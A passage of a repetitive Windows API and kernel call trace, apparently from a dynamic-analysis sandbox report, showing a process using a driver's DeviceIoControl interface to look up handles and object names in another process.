PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.686] PsAcquireProcessExitSynchronization () returned 0x0 [0220.686] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.686] ObReferenceObjectByHandle (in: Handle=0x278, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0089774a0, HandleInformation=0x0) returned 0x0 [0220.686] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.686] PsReleaseProcessExitSynchronization () returned 0x2 [0220.686] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.686] ObQueryNameString (in: Object=0xfffff8a0089774a0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.686] ObfDereferenceObject (Object=0xfffff8a0089774a0) returned 0x1 [0220.686] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.687] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.687] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.687] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.687] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.687] PsAcquireProcessExitSynchronization () returned 0x0 [0220.687] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.687] ObReferenceObjectByHandle (in: Handle=0x27c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000cb0c90, HandleInformation=0x0) returned 0x0 [0220.687] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.687] PsReleaseProcessExitSynchronization () returned 0x2 [0220.687] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.687] ObQueryNameString (in: Object=0xfffff8a000cb0c90, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.687] ObfDereferenceObject (Object=0xfffff8a000cb0c90) returned 0x1 [0220.687] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.687] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.687] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.687] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.688] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.688] PsAcquireProcessExitSynchronization () returned 0x0 [0220.688] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.688] ObReferenceObjectByHandle (in: Handle=0x30c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001432c90, HandleInformation=0x0) returned 0x0 [0220.688] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.688] PsReleaseProcessExitSynchronization () returned 0x2 [0220.688] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.688] ObQueryNameString (in: Object=0xfffff8a001432c90, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.688] ObfDereferenceObject (Object=0xfffff8a001432c90) returned 0x1 [0220.688] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.688] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.688] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.688] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.688] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.688] PsAcquireProcessExitSynchronization () returned 0x0 [0220.689] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.689] ObReferenceObjectByHandle (in: Handle=0x310, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00112c820, HandleInformation=0x0) returned 0x0 [0220.689] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.689] PsReleaseProcessExitSynchronization () returned 0x2 [0220.689] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.689] ObQueryNameString (in: Object=0xfffff8a00112c820, ObjectNameInfo=0xfffffa800306b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.689] ObfDereferenceObject (Object=0xfffff8a00112c820) returned 0x1 [0220.689] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.689] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.689] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.689] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.689] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.689] PsAcquireProcessExitSynchronization () returned 0x0 [0220.689] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.689] ObReferenceObjectByHandle (in: Handle=0x340, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000f88880, HandleInformation=0x0) returned 0x0 [0220.690] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.690] PsReleaseProcessExitSynchronization () returned 0x2 [0220.690] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.690] ObQueryNameString (in: Object=0xfffff8a000f88880, ObjectNameInfo=0xfffffa800306c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.690] ObfDereferenceObject (Object=0xfffff8a000f88880) returned 0x1 [0220.690] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.690] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.690] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.690] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.690] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.690] PsAcquireProcessExitSynchronization () returned 0x0 [0220.690] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.690] ObReferenceObjectByHandle (in: Handle=0x34c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000fac530, HandleInformation=0x0) returned 0x0 [0220.690] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.690] PsReleaseProcessExitSynchronization () returned 0x2 [0220.690] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.691] ObQueryNameString (in: Object=0xfffff8a000fac530, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.691] ObfDereferenceObject (Object=0xfffff8a000fac530) returned 0x1 [0220.691] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.691] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.691] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.692] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.692] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.692] PsAcquireProcessExitSynchronization () returned 0x0 [0220.692] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.692] ObReferenceObjectByHandle (in: Handle=0x350, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00196efc0, HandleInformation=0x0) returned 0x0 [0220.692] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.692] PsReleaseProcessExitSynchronization () returned 0x2 [0220.692] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.692] ObQueryNameString (in: Object=0xfffff8a00196efc0, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.692] ObfDereferenceObject (Object=0xfffff8a00196efc0) returned 0x1 [0220.692] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.692] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.692] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.692] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.692] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.693] PsAcquireProcessExitSynchronization () returned 0x0 [0220.693] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.693] ObReferenceObjectByHandle (in: Handle=0x390, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0010366b0, HandleInformation=0x0) returned 0x0 [0220.693] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.693] PsReleaseProcessExitSynchronization () returned 0x2 [0220.693] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.693] ObQueryNameString (in: Object=0xfffff8a0010366b0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.693] ObfDereferenceObject (Object=0xfffff8a0010366b0) returned 0x1 [0220.693] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.693] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.693] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.693] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.693] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.693] PsAcquireProcessExitSynchronization () returned 0x0 [0220.694] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.694] ObReferenceObjectByHandle (in: Handle=0x3a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00103ebc0, HandleInformation=0x0) returned 0x0 [0220.694] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.694] PsReleaseProcessExitSynchronization () returned 0x2 [0220.694] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.694] ObQueryNameString (in: Object=0xfffff8a00103ebc0, ObjectNameInfo=0xfffffa8003070044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003070044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.694] ObfDereferenceObject (Object=0xfffff8a00103ebc0) returned 0x1 [0220.694] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.694] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.694] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.694] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.694] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.694] PsAcquireProcessExitSynchronization () returned 0x0 [0220.694] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.695] ObReferenceObjectByHandle (in: Handle=0x3f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00000aa70, HandleInformation=0x0) returned 0x0 [0220.695] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.695] PsReleaseProcessExitSynchronization () returned 0x2 [0220.695] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.695] ObQueryNameString (in: Object=0xfffff8a00000aa70, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.695] ObfDereferenceObject (Object=0xfffff8a00000aa70) returned 0x1 [0220.695] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.695] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.695] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.695] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.695] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.695] PsAcquireProcessExitSynchronization () returned 0x0 [0220.695] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.695] ObReferenceObjectByHandle (in: Handle=0x474, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00138cf40, HandleInformation=0x0) returned 0x0 [0220.695] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.695] PsReleaseProcessExitSynchronization () returned 0x2 [0220.695] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.696] ObQueryNameString (in: Object=0xfffff8a00138cf40, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.696] ObfDereferenceObject (Object=0xfffff8a00138cf40) returned 0x1 [0220.696] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.696] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.696] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.696] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.696] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.696] PsAcquireProcessExitSynchronization () returned 0x0 [0220.696] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.696] ObReferenceObjectByHandle (in: Handle=0x48c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00128d4f0, HandleInformation=0x0) returned 0x0 [0220.696] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.696] PsReleaseProcessExitSynchronization () returned 0x2 [0220.696] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.696] ObQueryNameString (in: Object=0xfffff8a00128d4f0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.696] ObfDereferenceObject (Object=0xfffff8a00128d4f0) returned 0x1 [0220.696] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.696] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.696] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.696] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.697] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.697] PsAcquireProcessExitSynchronization () returned 0x0 [0220.697] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.697] ObReferenceObjectByHandle (in: Handle=0x4cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00146d0f0, HandleInformation=0x0) returned 0x0 [0220.697] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.697] PsReleaseProcessExitSynchronization () returned 0x2 [0220.697] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.697] ObQueryNameString (in: Object=0xfffff8a00146d0f0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.697] ObfDereferenceObject (Object=0xfffff8a00146d0f0) returned 0x1 [0220.697] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.697] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.697] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.697] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.697] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.697] PsAcquireProcessExitSynchronization () returned 0x0 [0220.697] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.697] ObReferenceObjectByHandle (in: Handle=0x4d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0017b23b0, HandleInformation=0x0) returned 0x0 [0220.697] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.697] PsReleaseProcessExitSynchronization () returned 0x2 [0220.698] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.698] ObQueryNameString (in: Object=0xfffff8a0017b23b0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.698] ObfDereferenceObject (Object=0xfffff8a0017b23b0) returned 0x1 [0220.698] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.698] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.698] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.698] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.698] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.698] PsAcquireProcessExitSynchronization () returned 0x0 [0220.698] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.698] ObReferenceObjectByHandle (in: Handle=0x4dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001b4f800, HandleInformation=0x0) returned 0x0 [0220.698] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.698] PsReleaseProcessExitSynchronization () returned 0x2 [0220.698] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.698] ObQueryNameString (in: Object=0xfffff8a001b4f800, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.698] ObfDereferenceObject (Object=0xfffff8a001b4f800) returned 0x1 [0220.698] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.698] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.698] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.699] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.699] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.699] PsAcquireProcessExitSynchronization () returned 0x0 [0220.699] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.699] ObReferenceObjectByHandle (in: Handle=0x4e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001b25640, HandleInformation=0x0) returned 